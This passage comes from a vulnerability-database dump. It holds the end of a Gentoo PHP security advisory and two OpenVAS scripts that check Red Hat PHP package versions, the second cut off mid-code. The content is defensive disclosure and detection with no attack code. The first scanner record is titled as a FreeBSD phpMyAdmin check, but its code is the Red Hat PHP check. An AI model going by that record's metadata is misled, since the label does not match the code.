CVE-2010-2950\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2950\r\n[ 26 ] CVE-2010-3062\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3062\r\n[ 27 ] CVE-2010-3063\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3063\r\n[ 28 ] CVE-2010-3064\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3064\r\n[ 29 ] CVE-2010-3065\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3065\r\n[ 30 ] CVE-2010-3436\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3436\r\n[ 31 ] CVE-2010-3709\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3709\r\n[ 32 ] CVE-2010-3709\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3709\r\n[ 33 ] CVE-2010-3710\r\n 
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3710\r\n[ 34 ] CVE-2010-3710\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3710\r\n[ 35 ] CVE-2010-3870\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3870\r\n[ 36 ] CVE-2010-4150\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4150\r\n[ 37 ] CVE-2010-4409\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4409\r\n[ 38 ] CVE-2010-4645\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4645\r\n[ 39 ] CVE-2010-4697\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4697\r\n[ 40 ] CVE-2010-4698\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4698\r\n[ 41 ] CVE-2010-4699\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4699\r\n[ 42 ] CVE-2010-4700\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4700\r\n[ 43 ] CVE-2011-0420\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0420\r\n[ 44 ] CVE-2011-0421\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0421\r\n[ 45 ] CVE-2011-0708\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0708\r\n[ 46 ] CVE-2011-0752\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0752\r\n[ 47 ] CVE-2011-0753\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0753\r\n[ 48 ] CVE-2011-0755\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0755\r\n[ 49 ] CVE-2011-1092\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1092\r\n[ 50 ] CVE-2011-1148\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1148\r\n[ 51 ] CVE-2011-1153\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1153\r\n[ 52 ] CVE-2011-1464\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1464\r\n[ 53 ] CVE-2011-1466\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1466\r\n[ 54 ] CVE-2011-1467\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1467\r\n[ 55 ] CVE-2011-1468\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1468\r\n[ 56 ] CVE-2011-1469\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1469\r\n[ 57 ] CVE-2011-1470\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1470\r\n[ 58 ] CVE-2011-1471\r\n 
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1471\r\n[ 59 ] CVE-2011-1657\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1657\r\n[ 60 ] CVE-2011-1938\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1938\r\n[ 61 ] CVE-2011-2202\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2202\r\n[ 62 ] CVE-2011-2483\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2483\r\n[ 63 ] CVE-2011-3182\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3182\r\n[ 64 ] CVE-2011-3189\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3189\r\n[ 65 ] CVE-2011-3267\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3267\r\n[ 66 ] CVE-2011-3268\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3268\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-201110-06.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users' machines is of utmost\r\nimportance to us. 
Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttps://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2011 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner(s).\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/2.5\r\n", "cvss3": {}, "published": "2011-10-12T00:00:00", "type": "securityvulns", "title": "[ GLSA 201110-06 ] PHP: Multiple vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-0421", "CVE-2011-0752", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-1471", "CVE-2010-1129", "CVE-2010-2225", "CVE-2010-1868", "CVE-2011-1148", "CVE-2010-2484", "CVE-2010-2097", "CVE-2011-1466", "CVE-2010-2531", "CVE-2011-3189", "CVE-2010-3065", "CVE-2010-2191", "CVE-2011-1938", "CVE-2010-4697", "CVE-2010-1866", "CVE-2010-1915", "CVE-2011-1092", "CVE-2010-4698", "CVE-2011-2483", "CVE-2006-7243", "CVE-2011-0753", "CVE-2010-4645", "CVE-2010-3436", "CVE-2010-2093", "CVE-2011-1657", "CVE-2011-0708", "CVE-2010-3870", "CVE-2011-3268", "CVE-2010-1861", "CVE-2010-2190", "CVE-2010-3063", "CVE-2011-3182", "CVE-2010-2101", "CVE-2011-1468", "CVE-2011-0420", "CVE-2010-3062", "CVE-2010-1914", "CVE-2011-1470", "CVE-2010-1860", "CVE-2010-2094", "CVE-2010-3709", "CVE-2010-3064", "CVE-2011-1469", "CVE-2009-5016", "CVE-2011-3267", "CVE-2010-3710", "CVE-2010-4150", "CVE-2011-1464", "CVE-2011-0755", "CVE-2010-4699", "CVE-2010-1130", "CVE-2010-2100", "CVE-2011-2202", "CVE-2010-2950", "CVE-2010-4700", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-1864", "CVE-2010-4409", "CVE-2010-1862"], "modified": "2011-10-12T00:00:00", "id": "SECURITYVULNS:DOC:27147", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27147", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": 
[{"lastseen": "2019-05-29T18:39:37", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "FreeBSD Ports: phpmyadmin", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231069995", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069995", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_phpmyadmin11.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 7e4e5c53-a56c-11e0-b180-00216aa06fc2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n An input validation flaw was discovered in the PHP session serializer. If a\n PHP script generated session variable names from untrusted user input, a\n remote attacker could use this flaw to inject an arbitrary variable into\n the PHP session. (CVE-2010-3065)\n \n An information leak flaw was discovered in the PHP var_export() function\n implementation. If some fatal error occurred during the execution of this\n function (such as the exhaustion of memory or script execution time limit),\n part of the function's output was sent to the user as script output,\n possibly leading to the disclosure of sensitive information.\n (CVE-2010-2531)\n \n A numeric truncation error and an input validation flaw were found in the\n way the PHP utf8_decode() function decoded partial multi-byte sequences\n for some multi-byte encodings, sending them to output without them being\n escaped. An attacker could use these flaws to perform a cross-site\n scripting attack. (CVE-2009-5016, CVE-2010-3870)\n \n It was discovered that the PHP lcg_value() function used insufficient\n entropy to seed the pseudo-random number generator. A remote attacker could\n possibly use this flaw to predict values returned by the function, which\n are used to generate session identifiers by default. This update changes\n the function's implementation to use more entropy during seeding.\n (CVE-2010-1128)\n \n It was discovered that the PHP fnmatch() function did not restrict the\n length of the pattern argument. 
A remote attacker could use this flaw to\n crash the PHP interpreter where a script used fnmatch() on untrusted\n matching patterns. (CVE-2010-1917)\n \n A NULL pointer dereference flaw was discovered in the PHP XML-RPC\n extension. A malicious XML-RPC client or server could use this flaw to\n crash the PHP interpreter via a specially-crafted XML-RPC request.\n (CVE-2010-0397)\n \n All php users should upgrade to these updated packages, which contain\n backported patches to resolve these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"php on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-November/msg00035.html\");\n script_id(870362);\n script_version(\"$Revision: 8092 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-13 07:31:16 +0100 (Wed, 13 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0919-01\");\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_name(\"RedHat Update for php RHSA-2010:0919-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", 
\"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n 
if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n 
exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:54:40", "description": "Check for the Version of php", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "RedHat Update for php RHSA-2010:0919-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870", "CVE-2009-5016", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2017-12-25T00:00:00", "id": "OPENVAS:1361412562310870362", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870362", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for php RHSA-2010:0919-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n An input validation flaw was discovered in the PHP session serializer. 
If a\n PHP script generated session variable names from untrusted user input, a\n remote attacker could use this flaw to inject an arbitrary variable into\n the PHP session. (CVE-2010-3065)\n \n An information leak flaw was discovered in the PHP var_export() function\n implementation. If some fatal error occurred during the execution of this\n function (such as the exhaustion of memory or script execution time limit),\n part of the function's output was sent to the user as script output,\n possibly leading to the disclosure of sensitive information.\n (CVE-2010-2531)\n \n A numeric truncation error and an input validation flaw were found in the\n way the PHP utf8_decode() function decoded partial multi-byte sequences\n for some multi-byte encodings, sending them to output without them being\n escaped. An attacker could use these flaws to perform a cross-site\n scripting attack. (CVE-2009-5016, CVE-2010-3870)\n \n It was discovered that the PHP lcg_value() function used insufficient\n entropy to seed the pseudo-random number generator. A remote attacker could\n possibly use this flaw to predict values returned by the function, which\n are used to generate session identifiers by default. This update changes\n the function's implementation to use more entropy during seeding.\n (CVE-2010-1128)\n \n It was discovered that the PHP fnmatch() function did not restrict the\n length of the pattern argument. A remote attacker could use this flaw to\n crash the PHP interpreter where a script used fnmatch() on untrusted\n matching patterns. (CVE-2010-1917)\n \n A NULL pointer dereference flaw was discovered in the PHP XML-RPC\n extension. A malicious XML-RPC client or server could use this flaw to\n crash the PHP interpreter via a specially-crafted XML-RPC request.\n (CVE-2010-0397)\n \n All php users should upgrade to these updated packages, which contain\n backported patches to resolve these issues. 
After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"php on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-November/msg00035.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870362\");\n script_version(\"$Revision: 8244 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-25 08:29:28 +0100 (Mon, 25 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0919-01\");\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_name(\"RedHat Update for php RHSA-2010:0919-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == 
\"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
